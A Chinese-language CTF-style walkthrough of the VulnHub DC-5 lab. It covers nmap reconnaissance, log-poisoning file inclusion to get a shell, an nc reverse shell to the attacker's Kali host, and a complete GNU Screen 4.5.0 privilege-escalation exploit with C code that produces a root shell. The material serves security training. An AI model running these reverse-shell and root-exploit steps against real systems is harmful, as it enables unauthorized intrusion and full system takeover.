前言
⏰时间:2023.9.1
🗺️靶机地址:https://www.vulnhub.com/entry/dc-5,314/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.1)
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (192.168.58.2)
Host is up (0.00011s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for bogon (192.168.58.214)
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap 192.168.58.214
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.214)
Host is up (0.000050s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:65:F7:56 (VMware)
文件包含
访问80网站,唯一的一处功能点
存在文件包含
┌──(root㉿Erik)-[/home/eric/myfile]
└─# whatweb http://192.168.58.214
http://192.168.58.214 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.58.214], Title[Welcome], nginx[1.6.2]
getshell
站点用的nginx,一般日志路径在/var/log/nginx/access.log
访问时在ua头插入一句话,然后包含日志文件
提权root
用nc反弹shell到kali
nc -e /bin/bash 192.168.58.153 5555
script -qc bash /dev/null
查找suid权限
www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
这里screen显示4.5.0版本
搜一下相关模块
┌──(root㉿Erik)-[~eric/myfile]
└─# searchsploit screen 4.5.0
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
根据41154.sh 的提示
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
提权到root,拿到flag